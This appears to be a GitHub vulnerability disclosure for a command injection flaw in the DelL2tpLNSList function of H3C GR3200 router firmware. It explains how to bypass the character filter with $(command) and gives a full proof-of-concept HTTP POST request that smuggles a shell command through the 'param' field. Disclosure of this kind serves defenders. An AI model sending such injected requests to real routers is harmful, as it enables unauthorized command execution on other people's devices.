Skip to content

Latest commit

 

History

History
57 lines (36 loc) · 2.21 KB

readme.md

File metadata and controls

57 lines (36 loc) · 2.21 KB

H3C GR3200 MiniGR1B0V100R014 Has an command injection vulnerability

Overview

Product Information

Overview of affected versions of H3C GR3200 router:

image-20220724132311844

Vulnerability details

H3C GR3200 (<=MiniGR1B0V100R014) was found to contain a command insertion vulnerability in DelL2tpLNSList.This vulnerability allows an attacker to execute arbitrary commands through the "param" parameter.

image-20220724112402312

Format the param parameter we entered into V15 through the snprintf function, and execute our command through the system function. Because V10 and V11 are limited to 8 bytes, we can fill V10 with 8 bytes so that when %s in the snprintf function is formatted, V10 and V11 will be connected actively.

image-20220724132824754

Although the sub_100695A4 function filters some dangerous characters, we can bypass them with $(command).

Recurring vulnerabilities and POC

In order to reproduce the vulnerability, the following steps can be followed:

  1. Boot the firmware by qemu-system or other ways (real machine)
  2. Attack with the following POC attacks
POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://192.168.124.1:80/maintain_basic.asp
Cookie: JSESSIONID=04f803a0
Upgrade-Insecure-Requests: 1
Content-Length: 67

CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1;$(ps>/ww w/1)	#;

image-20220724133957626

The picture above shows the debug log after POC is sent.

image-20220724133234021

The above illustration shows the effect of command execution.